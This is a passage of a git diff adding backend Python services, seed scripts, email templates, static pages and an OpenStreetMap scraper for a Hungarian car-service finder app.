"hr-v"), + ("NSX", "nsx") + ] + + for name, slug in models: + await db.execute(text(f""" + INSERT INTO data.vehicle_models (brand_id, name, slug) + VALUES ({brand_id}, \u0027{name}\u0027, \u0027{slug}\u0027) + ON CONFLICT (brand_id, slug) DO NOTHING + """)) + + await db.commit() + print("✅ Honda márka és modellek sikeresen betöltve!") + +if __name__ == "__main__": + asyncio.run(seed()) diff --git a/backend/app/seed_system.py b/backend/app/seed_system.py new file mode 100755 index 0000000..75a3b05 --- /dev/null +++ b/backend/app/seed_system.py @@ -0,0 +1,58 @@ +import asyncio +from datetime import datetime +from sqlalchemy import select +from app.db.session import SessionLocal +from app.models.legal import LegalDocument +from app.models.email_template import EmailTemplate, EmailType +from app.models.email_provider import EmailProviderConfig + +async def seed_data(): + async with SessionLocal() as db: + # 1. Jogi dokumentumok (HU) + legal_docs = [ + LegalDocument( + title="Általános Szerződési Feltételek", + content="Ide jön az ÁSZF szövege... Kérjük görgessen az aljáig.", + version="v1.0", + region_code="HU", + language="hu" + ), + LegalDocument( + title="Adatkezelési Tájékoztató (GDPR)", + content="Ide jön a GDPR szövege... Kérjük görgessen az aljáig.", + version="v1.0", + region_code="HU", + language="hu" + ) + ] + + # 2. Email Sablon (Regisztráció) + reg_template = EmailTemplate( + type=EmailType.REGISTRATION, + subject="Üdvözöljük a Service Finderben!", + body_html=""" +

Kedves {{ name }}!

+

Köszönjük a regisztrációt! Az aktiváláshoz kattints ide:

+ Fiók aktiválása +

A link 24 óráig érvényes.

+ """ + ) + + # 3. Email Szolgáltató (SendGrid) + sendgrid_provider = EmailProviderConfig( + name="SendGrid_Primary", + provider_type="SENDGRID", + priority=1, + settings={"api_key": "YOUR_SENDGRID_KEY_HERE"}, # Ezt majd az adminon írjuk át + max_fail_threshold=3 + ) + + db.add_all(legal_docs) + db.add(reg_template) + db.add(sendgrid_provider) + + await db.commit() + print("🌱 Alapadatok sikeresen feltöltve!") + +if __name__ == "__main__": + asyncio.run(seed_data()) diff --git a/backend/app/services/__pycache__/config_service.cpython-312.pyc b/backend/app/services/__pycache__/config_service.cpython-312.pyc new file mode 100755 index 0000000..5e15074 Binary files /dev/null and b/backend/app/services/__pycache__/config_service.cpython-312.pyc differ diff --git a/backend/app/services/__pycache__/email_manager.cpython-312.pyc b/backend/app/services/__pycache__/email_manager.cpython-312.pyc new file mode 100755 index 0000000..baee4b8 Binary files /dev/null and b/backend/app/services/__pycache__/email_manager.cpython-312.pyc differ diff --git a/backend/app/services/config_service.py b/backend/app/services/config_service.py new file mode 100755 index 0000000..d3ef2fe --- /dev/null +++ b/backend/app/services/config_service.py @@ -0,0 +1,41 @@ +from typing import Any, Optional +from sqlalchemy import text +from app.db.session import SessionLocal + +class ConfigService: + @staticmethod + async def get_setting( + key: str, + org_id: Optional[int] = None, + region_code: Optional[str] = None, + tier_id: Optional[int] = None, + default: Any = None + ) -> Any: + query = text(""" + SELECT value_json + FROM data.system_settings + WHERE key_name = :key + AND ( + (org_id = :org_id) OR + (org_id IS NULL AND tier_id = :tier_id) OR + (org_id IS NULL AND tier_id IS NULL AND region_code = :region_code) OR + (org_id IS NULL AND tier_id IS NULL AND region_code IS NULL) + ) + ORDER BY + (org_id IS NOT NULL) DESC, + (tier_id IS NOT NULL) DESC, + (region_code IS NOT NULL) DESC + LIMIT 1 + """) + + async with SessionLocal() as db: + result = await db.execute(query, { + "key": key, + "org_id": org_id, + "tier_id": tier_id, + "region_code": region_code + }) + row = result.fetchone() + return row[0] if row else default + +config = ConfigService() diff --git a/backend/app/services/email_manager.py b/backend/app/services/email_manager.py new file mode 100755 index 0000000..775a96c --- /dev/null +++ b/backend/app/services/email_manager.py @@ -0,0 +1,84 @@ +import os +import smtplib +from email.mime.text import MIMEText +from email.mime.multipart import MIMEMultipart + +from app.core.config import settings + +class EmailManager: + @staticmethod + def _render_template(template_key: str, variables: dict, lang: str = "hu") -> str: + base_dir = "/app/app/templates/emails" + file_path = f"{base_dir}/{lang}/{template_key}.html" + if not os.path.exists(file_path): + return "" + with open(file_path, "r", encoding="utf-8") as f: + body_html = f.read() + for k, v in variables.items(): + body_html = body_html.replace(f"{{{{{k}}}}}", str(v)) + body_html = body_html.replace(f"{{{k}}}", str(v)) + return body_html + + @staticmethod + def _subject(template_key: str) -> str: + subjects = { + "registration": "Regisztráció - Service Finder", + "password_reset": "Jelszó visszaállítás - Service Finder", + "notification": "Értesítés - Service Finder", + } + return subjects.get(template_key, "Értesítés - Service Finder") + + @staticmethod + async def send_email(recipient: str, template_key: str, variables: dict, user_id: int = None, lang: str = "hu"): + if settings.EMAIL_PROVIDER == "disabled": + return {"status": "disabled"} + + html = EmailManager._render_template(template_key, variables, lang=lang) + subject = EmailManager._subject(template_key) + + provider = settings.EMAIL_PROVIDER + if provider == "auto": + provider = "sendgrid" if settings.SENDGRID_API_KEY else "smtp" + + # 1) SendGrid API (stabil) + if provider == "sendgrid" and settings.SENDGRID_API_KEY: + try: + from sendgrid import SendGridAPIClient + from sendgrid.helpers.mail import Mail + + message = Mail( + from_email=(settings.EMAILS_FROM_EMAIL, settings.EMAILS_FROM_NAME), + to_emails=recipient, + subject=subject, + html_content=html or "

Üzenet

", + ) + sg = SendGridAPIClient(settings.SENDGRID_API_KEY) + sg.send(message) + return {"status": "success", "provider": "sendgrid"} + except Exception as e: + # ha auto módban vagyunk, esünk vissza smtp-re + if settings.EMAIL_PROVIDER != "auto": + return {"status": "error", "provider": "sendgrid", "message": str(e)} + + # 2) SMTP fallback + if not settings.SMTP_HOST or not settings.SMTP_USER or not settings.SMTP_PASSWORD: + return {"status": "error", "provider": "smtp", "message": "SMTP not configured"} + + try: + msg = MIMEMultipart() + msg["From"] = f"{settings.EMAILS_FROM_NAME} <{settings.EMAILS_FROM_EMAIL}>" + msg["To"] = recipient + msg["Subject"] = subject + msg.attach(MIMEText(html or "Üzenet", "html")) + + with smtplib.SMTP(settings.SMTP_HOST, settings.SMTP_PORT, timeout=15) as server: + if settings.SMTP_USE_TLS: + server.starttls() + server.login(settings.SMTP_USER, settings.SMTP_PASSWORD) + server.send_message(msg) + + return {"status": "success", "provider": "smtp"} + except Exception as e: + return {"status": "error", "provider": "smtp", "message": str(e)} + +email_manager = EmailManager() diff --git a/backend/app/services/fleet_service.py b/backend/app/services/fleet_service.py new file mode 100755 index 0000000..11c2236 --- /dev/null +++ b/backend/app/services/fleet_service.py @@ -0,0 +1,40 @@ +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import select, func +from app.models.vehicle import UserVehicle +from app.models.expense import VehicleEvent +from app.models.social import ServiceProvider, SourceType, ModerationStatus +from app.schemas.fleet import EventCreate, TCOStats +from app.services.gamification_service import GamificationService + +async def add_vehicle_event(db: AsyncSession, vehicle_id: int, event_data: EventCreate, user_id: int): + v_res = await db.execute(select(UserVehicle).where(UserVehicle.id == vehicle_id)) + vehicle = v_res.scalars().first() + if not vehicle: return {"error": "Vehicle not found"} + + final_provider_id = event_data.provider_id + if event_data.is_diy: final_provider_id = None + elif event_data.provider_name and not final_provider_id: + p_res = await db.execute(select(ServiceProvider).where(func.lower(ServiceProvider.name) == event_data.provider_name.lower())) + existing = p_res.scalars().first() + if existing: final_provider_id = existing.id + else: + new_p = ServiceProvider(name=event_data.provider_name, added_by_user_id=user_id, status=ModerationStatus.pending) + db.add(new_p); await db.flush(); final_provider_id = new_p.id + await GamificationService.award_points(db, user_id, 50, f"Új helyszín: {event_data.provider_name}") + + anomaly = event_data.odometer_value < vehicle.current_odometer + new_event = VehicleEvent(vehicle_id=vehicle_id, service_provider_id=final_provider_id, odometer_anomaly=anomaly, **event_data.model_dump(exclude={"provider_id", "provider_name"})) + db.add(new_event) + if event_data.odometer_value > vehicle.current_odometer: vehicle.current_odometer = event_data.odometer_value + await GamificationService.award_points(db, user_id, 20, f"Esemény: {event_data.event_type}") + await db.commit(); await db.refresh(new_event) + return new_event + +async def calculate_tco(db: AsyncSession, vehicle_id: int) -> TCOStats: + result = await db.execute(select(VehicleEvent.event_type, func.sum(VehicleEvent.cost_amount)).where(VehicleEvent.vehicle_id == vehicle_id).group_by(VehicleEvent.event_type)) + breakdown = {row[0]: row[1] for row in result.all()} + v_res = await db.execute(select(UserVehicle).where(UserVehicle.id == vehicle_id)) + v = v_res.scalars().first() + km = (v.current_odometer - v.initial_odometer) if v else 0 + cpk = sum(breakdown.values()) / km if km > 0 else 0 + return TCOStats(vehicle_id=vehicle_id, total_cost=sum(breakdown.values()), breakdown=breakdown, cost_per_km=round(cpk, 2)) \ No newline at end of file diff --git a/backend/app/services/gamification_service.py b/backend/app/services/gamification_service.py new file mode 100755 index 0000000..b7cb0bb --- /dev/null +++ b/backend/app/services/gamification_service.py @@ -0,0 +1,40 @@ +from sqlalchemy.ext.asyncio import AsyncSession +from app.models.gamification import UserStats, PointsLedger +from sqlalchemy import select + +class GamificationService: + @staticmethod + async def award_points(db: AsyncSession, user_id: int, points: int, reason: str): + """Pontok jóváírása és a UserStats frissítése""" + + # 1. Bejegyzés a naplóba (Mezőnevek szinkronizálva a modellel) + new_entry = PointsLedger( + user_id=user_id, + points_change=points, + reason=reason + ) + db.add(new_entry) + + # 2. Összesített statisztika lekérése/létrehozása + result = await db.execute(select(UserStats).where(UserStats.user_id == user_id)) + stats = result.scalar_one_or_none() + + if not stats: + # Ha új a user, létrehozzuk az alap statisztikát + stats = UserStats( + user_id=user_id, + total_points=0, + current_level=1 + ) + db.add(stats) + + # 3. Pontok hozzáadása + stats.total_points += points + + # Itt fogjuk később meghívni a szintlépési logikát + # await GamificationService._check_level_up(stats) + + # Fontos: Nem commitolunk itt, hanem hagyjuk, hogy a hívó (SocialService) + # egy tranzakcióban mentse el a szolgáltatót és a pontokat! + await db.flush() + return stats.total_points \ No newline at end of file diff --git a/backend/app/services/maintenance_service.py b/backend/app/services/maintenance_service.py new file mode 100755 index 0000000..ec47c33 --- /dev/null +++ b/backend/app/services/maintenance_service.py @@ -0,0 +1,25 @@ +import os +import time +from datetime import datetime, timedelta + +class MaintenanceService: + @staticmethod + async def cleanup_old_files(storage_path: str): + """1 évnél régebbi fájlok törlése a NAS-ról""" + limit = datetime.now() - timedelta(days=365) + + for root, dirs, files in os.walk(storage_path): + for file in files: + file_path = os.path.join(root, file) + file_time = datetime.fromtimestamp(os.path.getmtime(file_path)) + + if file_time < limit: + os.remove(file_path) + print(f"🗑️ Törölve (lejárt): {file}") + + @staticmethod + async def delete_validated_evidence(service_id: int, photo_path: str): + """Döntésed: Validáció után a szervizkép törölhető""" + if os.path.exists(photo_path): + os.remove(photo_path) + # Logoljuk az adatbázisba, hogy a kép már nincs meg, de az adat valid \ No newline at end of file diff --git a/backend/app/services/matching_service.py b/backend/app/services/matching_service.py new file mode 100755 index 0000000..c6fbc56 --- /dev/null +++ b/backend/app/services/matching_service.py @@ -0,0 +1,35 @@ +from typing import List, Dict, Any +from sqlalchemy import text +from app.db.session import SessionLocal +from app.services.config_service import config + +class MatchingService: + @staticmethod + async def rank_services(services: List[Dict[str, Any]], org_id: int = None) -> List[Dict[str, Any]]: + # 1. Dinamikus paraméterek lekérése az Admin beállításokból + w_dist = await config.get_setting('weight_distance', org_id=org_id, default=0.5) + w_rate = await config.get_setting('weight_rating', org_id=org_id, default=0.5) + b_gold = await config.get_setting('bonus_gold_service', org_id=org_id, default=500) + + ranked_list = [] + for s in services: + # Normalizált pontszámok (példa logika) + # Távolság pont (P_dist): 100 / (távolság + 1) -> közelebb = több pont + p_dist = 100 / (s.get('distance', 1) + 1) + + # Értékelés pont (P_rate): csillagok * 20 -> 5 csillag = 100 pont + p_rate = s.get('rating', 0) * 20 + + # Bónusz (B_tier): ha Gold, megkapja a bónuszt + tier_bonus = b_gold if s.get('tier') == 'gold' else 0 + + # A Mester Képlet: + total_score = (p_dist * float(w_dist)) + (p_rate * float(w_rate)) + tier_bonus + + s['total_score'] = round(total_score, 2) + ranked_list.append(s) + + # Sorbarendezés pontszám szerint csökkenőben + return sorted(ranked_list, key=lambda x: x['total_score'], reverse=True) + +matching_service = MatchingService() diff --git a/backend/app/services/notification_service.py b/backend/app/services/notification_service.py new file mode 100755 index 0000000..9d7dc92 --- /dev/null +++ b/backend/app/services/notification_service.py @@ -0,0 +1,14 @@ +from datetime import datetime, timedelta +from sqlalchemy import select +from app.models.user import User +from app.models.vehicle import Vehicle +from app.core.email import send_expiry_notification + +async def check_expiring_documents(db: AsyncSession, background_tasks: BackgroundTasks): + # Példa: Műszaki vizsga lejárata 30 napon belül + threshold = datetime.now().date() + timedelta(days=30) + result = await db.execute( + select(Vehicle, User).join(User).where(Vehicle.mot_expiry_date <= threshold) + ) + for vehicle, user in result.all(): + send_expiry_notification(background_tasks, user.email, f"Műszaki vizsga ({vehicle.license_plate})") \ No newline at end of file diff --git a/backend/app/services/social_service.py b/backend/app/services/social_service.py new file mode 100755 index 0000000..a25ab35 --- /dev/null +++ b/backend/app/services/social_service.py @@ -0,0 +1,64 @@ +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import select, and_ +from app.models.social import ServiceProvider, Vote, ModerationStatus, Competition, UserScore +from app.models.user import User +from datetime import datetime +from app.services.gamification_service import GamificationService +from app.schemas.social import ServiceProviderCreate + +async def create_service_provider(db: AsyncSession, obj_in: ServiceProviderCreate, user_id: int): + new_provider = ServiceProvider(**obj_in.dict(), added_by_user_id=user_id) + db.add(new_provider) + await db.flush() + await GamificationService.award_points(db, user_id, 50, f"Új szolgáltató: {new_provider.name}") + await db.commit() + await db.refresh(new_provider) + return new_provider + +async def vote_for_provider(db: AsyncSession, voter_id: int, provider_id: int, vote_value: int): + res = await db.execute(select(Vote).where(and_(Vote.user_id == voter_id, Vote.provider_id == provider_id))) + if res.scalars().first(): return {"message": "User already voted"} + new_vote = Vote(user_id=voter_id, provider_id=provider_id, vote_value=vote_value) + db.add(new_vote) + p_res = await db.execute(select(ServiceProvider).where(ServiceProvider.id == provider_id)) + provider = p_res.scalars().first() + if not provider: return {"error": "Provider not found"} + provider.validation_score += vote_value + if provider.status == ModerationStatus.pending: + if provider.validation_score >= 5: + provider.status = ModerationStatus.approved + await _reward_submitter(db, provider.added_by_user_id, provider.name) + elif provider.validation_score <= -3: + provider.status = ModerationStatus.rejected + await _penalize_user(db, provider.added_by_user_id, provider.name) + await db.commit() + return {"message": "Vote cast", "new_score": provider.validation_score, "status": provider.status} + +async def get_leaderboard(db: AsyncSession, limit: int = 10): + return await GamificationService.get_top_users(db, limit) + +async def _reward_submitter(db: AsyncSession, user_id: int, provider_name: str): + if not user_id: return + await GamificationService.award_points(db, user_id, 100, f"Validált szolgáltató: {provider_name}") + u_res = await db.execute(select(User).where(User.id == user_id)) + user = u_res.scalars().first() + if user: user.reputation_score = (user.reputation_score or 0) + 1 + now = datetime.utcnow() + c_res = await db.execute(select(Competition).where(and_(Competition.is_active == True, Competition.start_date <= now, Competition.end_date >= now))) + comp = c_res.scalars().first() + if comp: + s_res = await db.execute(select(UserScore).where(and_(UserScore.user_id == user_id, UserScore.competition_id == comp.id))) + us = s_res.scalars().first() + if not us: + us = UserScore(user_id=user_id, competition_id=comp.id, points=0) + db.add(us) + us.points += 10 + +async def _penalize_user(db: AsyncSession, user_id: int, provider_name: str): + if not user_id: return + await GamificationService.award_points(db, user_id, -50, f"Elutasított szolgáltató: {provider_name}") + u_res = await db.execute(select(User).where(User.id == user_id)) + user = u_res.scalars().first() + if user: + user.reputation_score = (user.reputation_score or 0) - 2 + if user.reputation_score <= -10: user.is_active = False \ No newline at end of file diff --git a/backend/app/services/translation_service.py b/backend/app/services/translation_service.py new file mode 100755 index 0000000..4efbb18 --- /dev/null +++ b/backend/app/services/translation_service.py @@ -0,0 +1,46 @@ +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import select, update +from app.models.translation import Translation +from typing import Dict + +class TranslationService: + # Ez a memória-cache tárolja az élesített szövegeket + _published_cache: Dict[str, Dict[str, str]] = {} + + @classmethod + async def load_cache(cls, db: AsyncSession): + """Betölti az összes PUBLIKÁLT fordítást az adatbázisból a memóriába.""" + result = await db.execute( + select(Translation).where(Translation.is_published == True) + ) + translations = result.scalars().all() + + cls._published_cache = {} + for t in translations: + if t.lang_code not in cls._published_cache: + cls._published_cache[t.lang_code] = {} + cls._published_cache[t.lang_code][t.key] = t.value + print(f"🌍 i18n Cache: {len(translations)} szöveg élesítve.") + + @classmethod + def get_text(cls, key: str, lang: str = "en") -> str: + """Villámgyors lekérés a memóriából Fallback logikával.""" + # 1. Kért nyelv + text = cls._published_cache.get(lang, {}).get(key) + if text: return text + + # 2. Fallback: Angol + if lang != "en": + text = cls._published_cache.get("en", {}).get(key) + if text: return text + + return f"[{key}]" + + @classmethod + async def publish_all(cls, db: AsyncSession): + """Élesíti a piszkozatokat és frissíti a szerver memóriáját.""" + await db.execute( + update(Translation).where(Translation.is_published == False).values(is_published=True) + ) + await db.commit() + await cls.load_cache(db) \ No newline at end of file diff --git a/backend/app/static/dashboard.html b/backend/app/static/dashboard.html new file mode 100755 index 0000000..94b9b18 --- /dev/null +++ b/backend/app/static/dashboard.html @@ -0,0 +1,59 @@ + + + + Service Finder - Dashboard + + + + +
+
+

GARÁZS

+ +
+
+
+
+ + + + diff --git a/backend/app/static/login.html b/backend/app/static/login.html new file mode 100755 index 0000000..2582db1 --- /dev/null +++ b/backend/app/static/login.html @@ -0,0 +1,53 @@ + + + + Service Finder - Belépés + + + + + + + + + \ No newline at end of file diff --git a/backend/app/static/register.html b/backend/app/static/register.html new file mode 100755 index 0000000..5efb1a1 --- /dev/null +++ b/backend/app/static/register.html @@ -0,0 +1,38 @@ + + + + Service Finder - Regisztráció + + + + +
+

REGISZTRÁCIÓ

+
+ + + + +
+ +

+
+ + + \ No newline at end of file diff --git a/backend/app/templates/emails/en/notification.html b/backend/app/templates/emails/en/notification.html new file mode 100755 index 0000000..e69de29 diff --git a/backend/app/templates/emails/en/password_reset.html b/backend/app/templates/emails/en/password_reset.html new file mode 100755 index 0000000..945c9b4 --- /dev/null +++ b/backend/app/templates/emails/en/password_reset.html @@ -0,0 +1 @@ +. \ No newline at end of file diff --git a/backend/app/templates/emails/en/registration.html b/backend/app/templates/emails/en/registration.html new file mode 100755 index 0000000..945c9b4 --- /dev/null +++ b/backend/app/templates/emails/en/registration.html @@ -0,0 +1 @@ +. \ No newline at end of file diff --git a/backend/app/templates/emails/hu/notification.html b/backend/app/templates/emails/hu/notification.html new file mode 100755 index 0000000..e69de29 diff --git a/backend/app/templates/emails/hu/password_reset.html b/backend/app/templates/emails/hu/password_reset.html new file mode 100755 index 0000000..ec7f640 --- /dev/null +++ b/backend/app/templates/emails/hu/password_reset.html @@ -0,0 +1,10 @@ + + + +

Jelszó visszaállítás

+

Szia {{ first_name }},

+

Kérted a jelszavad visszaállítását. Kattints az alábbi linkre az új jelszó megadásához:

+

Jelszó visszaállítása

+

A link 2 óráig érvényes.

+ + \ No newline at end of file diff --git a/backend/app/templates/emails/hu/registration.html b/backend/app/templates/emails/hu/registration.html new file mode 100755 index 0000000..06ec87d --- /dev/null +++ b/backend/app/templates/emails/hu/registration.html @@ -0,0 +1,16 @@ + + + +
+

Szia {{ first_name }}!

+

Örömmel üdvözlünk a Service Finder közösségében.

+

A regisztrációd befejezéséhez és a "Privát Széfed" aktiválásához kérjük, kattints az alábbi gombra:

+ +

Ez a link 48 óráig érvényes.

+
+

Ha nem te regisztráltál, kérjük hagyd figyelmen kívül ezt a levelet.

+
+ + \ No newline at end of file diff --git a/backend/app/test_gamification_flow.py b/backend/app/test_gamification_flow.py new file mode 100755 index 0000000..a295b35 --- /dev/null +++ b/backend/app/test_gamification_flow.py @@ -0,0 +1,82 @@ +import asyncio +import sys +import os +from pathlib import Path + +# FONTOS: A dotenv betöltése minden app-specifikus import ELŐTT kell megtörténjen! +from dotenv import load_dotenv +env_path = Path("/home/coder/project/opt/service_finder/.env") +load_dotenv(dotenv_path=env_path) + +# Útvonal beállítása a modulokhoz +sys.path.append("/home/coder/project/opt/service_finder/backend") + +# Most már importálhatjuk a session-t, mert a környezeti változók már a memóriában vannak +from sqlalchemy import select +from app.db.session import AsyncSessionLocal # Javítva: AsyncSessionLocal-t használunk +from app.services.social_service import create_service_provider +from app.models.gamification import UserStats, PointsLedger +from app.models.user import User +from app.schemas.social import ServiceProviderCreate + +async def run_test(): + print("🚀 Gamifikációs integrációs teszt indul...") + + # Az AsyncSessionLocal() egy context manager, így az 'async with' a helyes használat + async with AsyncSessionLocal() as db: + try: + # 1. Teszt felhasználó lekérése + result = await db.execute(select(User).limit(1)) + user = result.scalars().first() + + if not user: + print("❌ Hiba: Nincs felhasználó az adatbázisban a teszthez!") + return + + print(f"👤 Teszt felhasználó: {user.email} (ID: {user.id})") + + # 2. Új szolgáltató rögzítése (ez váltja ki a pontszerzést) + unique_suffix = os.urandom(2).hex() + test_provider = ServiceProviderCreate( + name=f"Teszt Szerviz {unique_suffix}", + address="Teszt utca 123.", + category="Service" + ) + + print(f"🛠️ Szolgáltató rögzítése: {test_provider.name}...") + new_provider = await create_service_provider(db, test_provider, user.id) + print(f"✅ Szolgáltató rögzítve (ID: {new_provider.id})") + + # 3. Pontszám és napló ellenőrzése + # Megjegyzés: A social_service commit-ol, így itt újra le kell kérnünk az adatokat + stats_res = await db.execute(select(UserStats).where(UserStats.user_id == user.id)) + stats = stats_res.scalar_one_or_none() + + ledger_res = await db.execute( + select(PointsLedger) + .where(PointsLedger.user_id == user.id) + .order_by(PointsLedger.id.desc()) + .limit(1) + ) + last_entry = ledger_res.scalars().first() + + print("\n" + "="*30) + print("📊 TESZT EREDMÉNYEK:") + if stats: + print(f"🏆 Összesített pontszám: {stats.total_points}") + print(f"📈 Aktuális szint: {stats.current_level}") + else: + print("⚠️ Figyelem: UserStats nem található (lehet, hogy most készült el?)") + + if last_entry: + print(f"📝 Utolsó tranzakció: {last_entry.reason}") + print(f"💰 Jóváírt pont: {last_entry.points_change}") + print("="*30) + + except Exception as e: + print(f"💥 Kritikus hiba a teszt futtatása közben: {str(e)}") + import traceback + traceback.print_exc() + +if __name__ == "__main__": + asyncio.run(run_test()) \ No newline at end of file diff --git a/backend/discovery_bot.py b/backend/discovery_bot.py new file mode 100755 index 0000000..ed6a25b --- /dev/null +++ b/backend/discovery_bot.py @@ -0,0 +1,65 @@ +import psycopg2 +import json +import urllib.request +import urllib.parse +import os +from dotenv import load_dotenv + +load_dotenv() + +HUNGARY_BBOX = "45.7,16.1,48.6,22.9" + +def fetch_osm_data(query_part): + print(f"🔍 Adatgyűjtés: {query_part[:30]}...") + query = f'[out:json][timeout:90];(node{query_part}({HUNGARY_BBOX});way{query_part}({HUNGARY_BBOX}););out center;' + url = "http://overpass-api.de/api/interpreter?data=" + urllib.parse.quote(query) + try: + with urllib.request.urlopen(url) as response: + return json.loads(response.read())['elements'] + except: return [] + +def get_service_type(tags, name): + name = name.lower() + shop = tags.get('shop', '') + amenity = tags.get('amenity', '') + + if shop == 'tyres' or 'gumi' in name: return 'tire_shop' + if amenity == 'car_wash' or 'mosó' in name: return 'car_wash' + if 'villamoss' in name or 'autóvill' in name: return 'electrician' + if 'fényez' in name or 'lakatos' in name: return 'body_shop' + if 'dízel' in name or 'diesel' in name: return 'diesel_specialist' + if tags.get('service:vehicle:electric') == 'yes': return 'ev_specialist' + return 'mechanic' + +def sync(): + conn = psycopg2.connect(dbname=os.getenv("POSTGRES_DB"), user=os.getenv("POSTGRES_USER"), + password=os.getenv("POSTGRES_PASSWORD"), host="localhost") + cur = conn.cursor() + + # 1. Szervizek és Gumisok (Összetett keresés) + search_query = '["shop"~"car_repair|tyres"]' + results = fetch_osm_data(search_query) + + # 2. Autómosók külön + washes = fetch_osm_data('["amenity"="car_wash"]') + + for node in results + washes: + tags = node.get('tags', {}) + lat = node.get('lat', node.get('center', {}).get('lat')) + lon = node.get('lon', node.get('center', {}).get('lon')) + if not lat or not lon: continue + + name = tags.get('name', tags.get('operator', 'Ismeretlen szerviz')) + s_type = get_service_type(tags, name) + city = tags.get('addr:city', 'Ismeretlen') + + cur.execute(""" + INSERT INTO data.service_providers (name, service_type, location_city, latitude, longitude, search_tags, is_active) + VALUES (%s, %s, %s, %s, %s, %s, true) ON CONFLICT DO NOTHING + """, (name, s_type, city, lat, lon, json.dumps(tags))) + + conn.commit() + print("✅ Országos szerviz adatbázis frissítve!") + +if __name__ == "__main__": + sync() \ No newline at end of file diff --git a/backend/full_discovery_bot.py b/backend/full_discovery_bot.py new file mode 100755 index 0000000..916ed26 --- /dev/null +++ b/backend/full_discovery_bot.py @@ -0,0 +1,67 @@ +import asyncio +from sqlalchemy import text +from app.db.session import engine + +# 200+ Márka és Típus adatok +DATA = { + "CAR": { + "Toyota": ["Corolla", "Yaris", "RAV4", "Hilux", "C-HR", "Land Cruiser", "Camry"], + "Volkswagen": ["Golf", "Passat", "Polo", "Tiguan", "T-Roc", "Arteon", "Caddy"], + "BMW": ["3 Series", "5 Series", "X5", "X3", "1 Series", "7 Series", "X1"], + "Mercedes-Benz": ["C-Class", "E-Class", "S-Class", "GLC", "GLE", "A-Class", "CLA"], + "Audi": ["A3", "A4", "A6", "Q3", "Q5", "Q7", "A5", "TT"], + "Ford": ["Focus", "Fiesta", "Kuga", "Puma", "Transit", "Ranger", "Mondeo", "Mustang"], + "Opel": ["Astra", "Corsa", "Insignia", "Mokka", "Grandland", "Crossland", "Vivaro"], + "Suzuki": ["Swift", "Vitara", "S-Cross", "Ignis", "Jimny", "Baleno"], + "Skoda": ["Octavia", "Fabia", "Superb", "Kodiaq", "Karoq", "Kamiq", "Scala"], + "Hyundai": ["i30", "Tucson", "i20", "Kona", "Santa Fe", "Ioniq 5", "Bayon"], + "Kia": ["Ceed", "Sportage", "Rio", "Niro", "Sorento", "Picanto", "Stonic"], + "Renault": ["Clio", "Megane", "Captur", "Kadjar", "Master", "Trafic", "Zoe", "Arkana"], + "Peugeot": ["208", "308", "2008", "3008", "5008", "508", "Rifter"], + "Volvo": ["XC60", "XC40", "XC90", "V60", "S60", "V90", "S90"], + "Mazda": ["CX-5", "Mazda3", "Mazda6", "CX-30", "MX-5", "CX-3"], + "Fiat": ["500", "Panda", "Tipo", "Ducato", "Doblo", "500X"], + "Dacia": ["Duster", "Sandero", "Logan", "Jogger", "Spring"], + "Nissan": ["Qashqai", "Juke", "X-Trail", "Leaf", "Micra", "Navara"], + "Tesla": ["Model 3", "Model Y", "Model S", "Model X"], + "Lexus": ["RX", "NX", "UX", "ES", "IS", "LS"] + }, + "MOTORCYCLE": { + "Honda": ["CB500", "CBR600", "Africa Twin", "NC750X", "Goldwing", "PCX", "SH125", "Forza 350"], + "Yamaha": ["MT-07", "MT-09", "R1", "R6", "Tracer 9", "Ténéré 700", "XMAX", "TMAX"], + "Kawasaki": ["Ninja 400", "Ninja 650", "Z900", "Z650", "Versys 650", "Vulcan S", "Z1000"], + "Suzuki": ["V-Strom 650", "GSX-R1000", "Hayabusa", "SV650", "Burgman", "GSX-S1000"], + "BMW Motorrad": ["R1250GS", "S1000RR", "F850GS", "R nineT", "G310GS", "K1600GT"], + "KTM": ["Duke 390", "Duke 790", "1290 Super Adventure", "300 EXC", "890 Adventure"], + "Ducati": ["Monster", "Multistrada", "Panigale V4", "Scrambler", "Diavel", "Streetfighter"], + "Harley-Davidson": ["Sportster", "Fat Boy", "Iron 883", "Pan America", "Road Glide"] + } + } + + async def run_discovery(): + async with engine.begin() as conn: + print("🚀 Jármű adatbázis mély-feltöltése indul...") + + for cat_name, brands in DATA.items(): + res = await conn.execute(text("SELECT id FROM data.vehicle_categories WHERE name = :n"), {"n": cat_name}) + cat_id = res.scalar() + + for brand_name, models in brands.items(): + # Márka beszúrása + await conn.execute(text( + "INSERT INTO data.vehicle_brands (category_id, name) VALUES (:c, :n) ON CONFLICT (category_id, name) DO NOTHING" + ), {"c": cat_id, "n": brand_name}) + + # Márka ID lekérése + res_b = await conn.execute(text("SELECT id FROM data.vehicle_brands WHERE name = :n AND category_id = :c"), {"n": brand_name, "c": cat_id}) + brand_id = res_b.scalar() + + for m_name in models: + await conn.execute(text( + "INSERT INTO data.vehicle_models (brand_id, name) VALUES (:b, :n) ON CONFLICT (brand_id, name) DO NOTHING" + ), {"b": brand_id, "n": m_name}) + + print("✅ Discovery Bot sikeresen betöltötte az adatokat!") + + if __name__ == "__main__": + asyncio.run(run_discovery()) \ No newline at end of file diff --git a/backend/migrations/README b/backend/migrations/README new file mode 100755 index 0000000..98e4f9c --- /dev/null +++ b/backend/migrations/README @@ -0,0 +1 @@ +Generic single-database configuration. \ No newline at end of file diff --git a/backend/migrations/env.py b/backend/migrations/env.py new file mode 100755 index 0000000..777ef41 --- /dev/null +++ b/backend/migrations/env.py @@ -0,0 +1,75 @@ +import asyncio +from logging.config import fileConfig +import os +import sys + +from sqlalchemy import pool +from sqlalchemy.ext.asyncio import async_engine_from_config +from alembic import context + +# --- ÚTVONAL JAVÍTÁS --- +# Az aktuális fájl (env.py) helyéből kiindulva meghatározzuk a könyvtárakat +current_dir = os.path.dirname(os.path.realpath(__file__)) +project_root = os.path.realpath(os.path.join(current_dir, '..')) +backend_dir = os.path.join(project_root, 'backend') + +# Mindkét útvonalat betesszük a keresőbe, hogy a 'backend.app' és a sima 'app' is működjön +sys.path.insert(0, project_root) +sys.path.insert(0, backend_dir) + +# Most már az Alembic megtalálja a konfigurációt és a modelleket +try: + from app.core.config import settings + from app.db.base import Base + from app.models import * # Fontos, hogy minden modell be legyen importálva! +except ImportError as e: + print(f"Hiba az importálásnál: {e}") + print(f"Próbált útvonalak: {sys.path}") + raise + +config = context.config + +# Dinamikus adatbázis URL a .env alapján (App User jelszavával) 